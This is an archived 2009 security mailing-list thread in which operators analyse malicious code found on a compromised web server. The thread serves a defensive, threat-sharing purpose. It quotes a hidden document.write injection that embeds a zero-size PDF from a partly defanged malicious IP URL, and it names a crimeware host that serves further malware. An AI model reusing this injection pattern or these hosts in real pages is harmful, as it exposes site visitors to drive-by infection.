Malicious code just found on web server 13E-7EB

• Previous message (by thread): SkypeSetup Rogue Download
• Next message (by thread): Important New Requirement for IPv4 Requests
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, Apr 20, 2009 at 10:42 AM, Jake Mailinglists
<jbabbinlists at gmail.com>wrote:

> Paul,
> I noticed that in the PDF file but as the domain doesn't seem to have
> resolution I didn't mention it.
>
> Jake
>
> WHOIS information on the domain
>
> Whois Record
>
> domain:     TEST1.RU
> type:       CORPORATE
> nserver:    ns1.centerhost.ru.
> nserver:    ns1.cetis.ru.
> state:      REGISTERED, DELEGATED
> org:        Center of Effective Technologies and Systems CETIS
> phone:      +7 4957711654
> fax-no:     +7 4957879251
> e-mail:     <http://www.domaintools.com/registrant-search/?email=f6261250d87c80094b7a5eb64d324e5a>
> e-mail:     <http://www.domaintools.com/registrant-search/?email=acac76ec2f649d85219bdf7879b125ff>
> registrar:  REGRU-REG-RIPN
> created:    2001.03.30
> paid-till:  2010.04.03
> source:     TC-RIPN
>
> Registry Data  Created: 2001-03-30  Expires: 2010-04-03  Whois Server:
> whois.ripn.net
>  Server Data Domain Status:  Registered And No Website
>
>
> On Fri, Apr 17, 2009 at 9:06 PM, Paul Ferguson <fergdawgster at gmail.com>wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>>  On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com>
>> wrote:
>>
>>
>> >> I took a quick look at the code... formatted it in a pastebin here:
>> >> http://pastebin.com/m7b50be54
>> >>
>> >> That javascript writes this to the page (URL obscured):
>> >> document.write("<embed
>> >> src=\"hXXp://
>> 77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|<http://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown%7C>
>> >> U nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
>> >> type=\"application/pdf\"></embed>");
>> >>
>> >> The 1.2.3.4 in the URL is my public IP address (I changed that).
>> >>
>> >> Below the javascript, it grabs a PDF:
>> >> <embed src="include/two.pdf" width="1" height="0"
>> >> style="border:none"></embed>
>> >>
>> >> That PDF is on the site, I haven't looked at it yet though.
>> >>
>>
>> Not only is that .pdf malicious, when "executed" it also fetches
>> additional
>> malware from:
>>
>> hxxp:// test1.ru /1.1.1/load.php
>>
>> If that host is not in your block list, it should be -- known purveyor of
>> crimeware.
>>
>> This is in addition to the other malicious URLs mentioned in this thread.
>>
>> - - ferg
>>
>> -----BEGIN PGP SIGNATURE-----
>> Version: PGP Desktop 9.5.3 (Build 5003)
>>
>> wj8DBQFJ6Seaq1pz9mNUZTMRAsePAJ4ltJybvyViJoiTJDbIN9JCMjbZtgCgtOnI
>> mxM8Ci/feKnJe6M6qbiESPw=
>> =b0Yj
>> -----END PGP SIGNATURE-----
>>
>>
>>
>> --
>> "Fergie", a.k.a. Paul Ferguson
>>  Engineering Architecture for the Internet
>>  fergdawgster(at)gmail.com
>>  ferg's tech blog: http://fergdawg.blogspot.com/
>>
>>
>

• Previous message (by thread): SkypeSetup Rogue Download
• Next message (by thread): Important New Requirement for IPv4 Requests
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]